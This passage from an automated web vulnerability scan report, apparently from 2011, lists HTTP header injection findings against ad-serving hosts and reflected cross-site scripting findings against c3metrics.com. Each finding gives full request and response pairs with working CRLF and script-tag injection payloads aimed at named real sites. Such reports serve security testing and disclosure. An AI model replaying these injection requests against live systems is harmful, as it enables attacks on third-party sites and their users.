sbt=b;sbt=ec;sbt=lf;sbt=lh;sbt=lhe;sbt=f;sbt=s;sbt=fc;sbt=fp;sbt=bcb;sbt=bcf;sbt=bh;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 13:29:08 GMT
Server: Apache/1.3.41 (Unix)
Location: http://gan.doubleclick.net/gan_impression?lid=41000000027557560&pubid=391ec
7c35b386e75

Cneonction: close
Content-Type: text/html; charset=iso-8859-1
Expires: Mon, 02 May 2011 13:29:08 GMT
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://gan.doubleclick.net/gan_impression?lid=4100
...[SNIP]...

5.7. http://rd.apmebf.com/w/get.media [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rd.apmebf.com
Path:   /w/get.media

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1594f%0d%0ad8816df24f9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1594f%0d%0ad8816df24f9/get.media?sid=53962&tp=5&d=j&t=n&host=media.fastclick.net HTTP/1.1
Host: rd.apmebf.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/news/western-australia/christmas-island-kill-accused-lashed-out-with-knife/story-e6frg13u-1226046333217
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=g14vo-36788-1303134591742-0g; LCLK=cjo!w6qx-s1wdo9y

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 12:49:04 GMT
Server: Apache/2.2.4 (Unix)
Set-Cookie: S=g14vo-36788-1303134591742-0g; domain=.apmebf.com; path=/; expires=Wed, 01-May-2013 12:49:04 GMT
Location: http://media.fastclick.net/1594f
d8816df24f9
/get.media?sid=53962&tp=5&d=j&t=n&no_cj_c=0&upsid=822523287793
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Content-Length: 311
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://media.fastclick.net/1594f
d8816df24f9/g
...[SNIP]...

5.8. http://rd.apmebf.com/w/get.media [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rd.apmebf.com
Path:   /w/get.media

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 9f542%0d%0a08d857cb4c0 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /w/9f542%0d%0a08d857cb4c0?sid=53962&tp=5&d=j&t=n&host=media.fastclick.net HTTP/1.1
Host: rd.apmebf.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/news/western-australia/christmas-island-kill-accused-lashed-out-with-knife/story-e6frg13u-1226046333217
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=g14vo-36788-1303134591742-0g; LCLK=cjo!w6qx-s1wdo9y

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 12:49:06 GMT
Server: Apache/2.2.4 (Unix)
Set-Cookie: S=g14vo-36788-1303134591742-0g; domain=.apmebf.com; path=/; expires=Wed, 01-May-2013 12:49:06 GMT
Location: http://media.fastclick.net/w/9f542
08d857cb4c0
?sid=53962&tp=5&d=j&t=n&no_cj_c=0&upsid=822523287793
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Content-Length: 303
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://media.fastclick.net/w/9f542
08d857cb4c0
...[SNIP]...

5.9. http://rd.apmebf.com/w/get.media [S cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rd.apmebf.com
Path:   /w/get.media

Issue detail

The value of the S cookie is copied into the Set-Cookie response header. The payload 5cdd4%0d%0af376d10c369 was submitted in the S cookie. This caused a response containing an injected HTTP header.

Request

GET /w/get.media?sid=53962&tp=5&d=j&t=n&host=media.fastclick.net HTTP/1.1
Host: rd.apmebf.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/news/western-australia/christmas-island-kill-accused-lashed-out-with-knife/story-e6frg13u-1226046333217
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=5cdd4%0d%0af376d10c369; LCLK=cjo!w6qx-s1wdo9y

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 12:48:58 GMT
Server: Apache/2.2.4 (Unix)
Set-Cookie: S=5cdd4
f376d10c369
; domain=.apmebf.com; path=/; expires=Wed, 01-May-2013 12:48:58 GMT
Location: http://media.fastclick.net/w/get.media?sid=53962&tp=5&d=j&t=n&no_cj_c=0&upsid=685045168926
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Content-Length: 294
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://media.fastclick.net/w/get.media?sid=5396
...[SNIP]...

5.10. http://www22.glam.com/cTagsImgCmd.act [gname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.glam.com
Path:   /cTagsImgCmd.act

Issue detail

The value of the gname request parameter is copied into the Set-Cookie response header. The payload 4d3ab%0d%0a9f9bde70083 was submitted in the gname parameter. This caused a response containing an injected HTTP header.

Request

GET /cTagsImgCmd.act?gtid=5000000440&gcmd=setc&gexpires=172800&gname=4d3ab%0d%0a9f9bde70083&gvalue=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902 HTTP/1.1
Host: www22.glam.com
Proxy-Connection: keep-alive
Referer: http://www.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; __utmb=234602824; __utmc=234602824; bkpix2=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://www35t.glam.com/jsadimp.gif?1^0^83646a252187d5dd806ea7087c4bc7cb^116391130334874196611^1^446224^/^1x1^5000000440^31230390^-1^-1^-1^-1^0^0^4251304341546423^p^^0^^US^511^0^0^0^WASHINGTON^0^0^0^0^^4d3ab
Set-Cookie: 4d3ab
9f9bde70083
=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; expires=Wed, 04 May 2011 13: 05:46 GMT; path=/; domain=.glam.com;
ETag: "662c9bddfc82c61ba8066514fc2b172e:1276888104"
P3P: policyref="http://www.glammedia.com/about_glam/legal/policy.xml", CP="NON DSP COR PSAo PSDo OUR IND UNI COM NAV STA"
Cache-Control: max-age=588
Date: Mon, 02 May 2011 13:05:46 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

6. Cross-site scripting (reflected)
There are 478 instances of this issue:


6.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload fa2f0<script>alert(1)</script>b1f522a3374 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480fa2f0<script>alert(1)</script>b1f522a3374&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.dailytelegraph.com.au/news/breaking-news/tony-abbott-says-migration-proposals-are-weak/story-e6freuz0-1226045133021?from=public_rss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; SERVERID=s7

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 12:50:00 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480fa2f0<script>alert(1)</script>b1f522a3374-SM=adver_05-02-2011-12-50-00; expires=Thu, 05-May-2011 12:50:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480fa2f0<script>alert(1)</script>b1f522a3374-VT=adver_05-02-2011-12-50-00_4343984361304340600; expires=Sat, 30-Apr-2016 12:50:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480fa2f0<script>alert(1)</script>b1f522a3374-nUID=adver_4343984361304340600; expires=Mon, 02-May-2011 13:05:00 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480fa2f0<script>alert(1)</script>b1f522a3374';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='4343984361304340600';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='
...[SNIP]...

6.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 192cc<script>alert(1)</script>0d7dd038fa4 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver192cc<script>alert(1)</script>0d7dd038fa4&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.dailytelegraph.com.au/news/breaking-news/tony-abbott-says-migration-proposals-are-weak/story-e6freuz0-1226045133021?from=public_rss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; SERVERID=s7

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 12:49:58 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver192cc%3Cscript%3Ealert%281%29%3C%2Fscript%3E0d7dd038fa4_05-02-2011-12-49-58; expires=Thu, 05-May-2011 12:49:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver192cc%3Cscript%3Ealert%281%29%3C%2Fscript%3E0d7dd038fa4_05-02-2011-12-49-58_15681511631304340598; expires=Sat, 30-Apr-2016 12:49:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver192cc%3Cscript%3Ealert%281%29%3C%2Fscript%3E0d7dd038fa4_15681511631304340598; expires=Mon, 02-May-2011 13:04:58 GMT; path=/; domain=c3metrics.com
Content-Length: 6700
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=window.c3Vinter}else this.C3VTcallVar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver192cc<script>alert(1)</script>0d7dd038fa4';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='156815116313043
...[SNIP]...

6.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e7a33<script>alert(1)</script>26cb5890d6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=/e7a33<script>alert(1)</script>26cb5890d6c&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.dailytelegraph.com.au/news/breaking-news/tony-abbott-says-migration-proposals-are-weak/story-e6freuz0-1226045133021?from=public_rss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; SERVERID=s7

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 12:50:16 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-50-16; expires=Thu, 05-May-2011 12:50:16 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_05-02-2011-12-50-16_11597600871304340616; expires=Sat, 30-Apr-2016 12:50:16 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_11597600871304340616; expires=Mon, 02-May-2011 13:05:16 GMT; path=/; domain=c3metrics.com
Content-Length: 6680
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
c3VJSnuid='11597600871304340616';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='/e7a33<script>alert(1)</script>26cb5890d6c';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

6.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the rv request parameter is copied into the HTML document as plain text between tags. The payload 2133b<script>alert(1)</script>1241548eef4 was submitted in the rv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=2133b<script>alert(1)</script>1241548eef4&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.dailytelegraph.com.au/news/breaking-news/tony-abbott-says-migration-proposals-are-weak/story-e6freuz0-1226045133021?from=public_rss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; SERVERID=s7

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 12:50:03 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-50-03; expires=Thu, 05-May-2011 12:50:03 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_05-02-2011-12-50-03_15350602311304340603; expires=Sat, 30-Apr-2016 12:50:03 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_15350602311304340603; expires=Mon, 02-May-2011 13:05:03 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
72191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='15350602311304340603';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='2133b<script>alert(1)</script>1241548eef4';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJSc
...[SNIP]...

6.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload f7222<script>alert(1)</script>307d61967c was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72f7222<script>alert(1)</script>307d61967c&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.dailytelegraph.com.au/news/breaking-news/tony-abbott-says-migration-proposals-are-weak/story-e6freuz0-1226045133021?from=public_rss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; SERVERID=s7

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 12:50:01 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-50-01; expires=Thu, 05-May-2011 12:50:01 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_05-02-2011-12-50-01_17578607731304340601; expires=Sat, 30-Apr-2016 12:50:01 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_17578607731304340601; expires=Mon, 02-May-2011 13:05:01 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
his.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='17578607731304340601';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72f7222<script>alert(1)</script>307d61967c';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3V
...[SNIP]...

6.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload d9e6d<script>alert(1)</script>e50c464bbef was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=d9e6d<script>alert(1)</script>e50c464bbef&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.dailytelegraph.com.au/news/breaking-news/tony-abbott-says-migration-proposals-are-weak/story-e6freuz0-1226045133021?from=public_rss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; SERVERID=s7

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 12:50:04 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-50-04; expires=Thu, 05-May-2011 12:50:04 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_05-02-2011-12-50-04_18223252631304340604; expires=Sat, 30-Apr-2016 12:50:04 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_18223252631304340604; expires=Mon, 02-May-2011 13:05:04 GMT; path=/; domain=c3metrics.com
Content-Length: 6679
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
.c3VJSnuid='18223252631304340604';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='d9e6d<script>alert(1)</script>e50c464bbef';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

6.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 923f8<script>alert(1)</script>0bafb8900a2 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=480923f8<script>alert(1)</script>0bafb8900a2&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.dailytelegraph.com.au/news/breaking-news/tony-abbott-says-migration-proposals-are-weak/story-e6freuz0-1226045133021?from=public_rss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 12:49:50 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s1; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480923f8<script>alert(1)</script>0bafb8900a2&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=ne
...[SNIP]...

6.8. http://480-adver-view.c3metrics.com/v.js [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload fe0cf<script>alert(1)</script>58e0387d345 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adverfe0cf<script>alert(1)</script>58e0387d345&cid=480&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.dailytelegraph.com.au/news/breaking-news/tony-abbott-says-migration-proposals-are-weak/story-e6freuz0-1226045133021?from=public_rss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 12:49:49 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s7; path=/
Cache-control: private

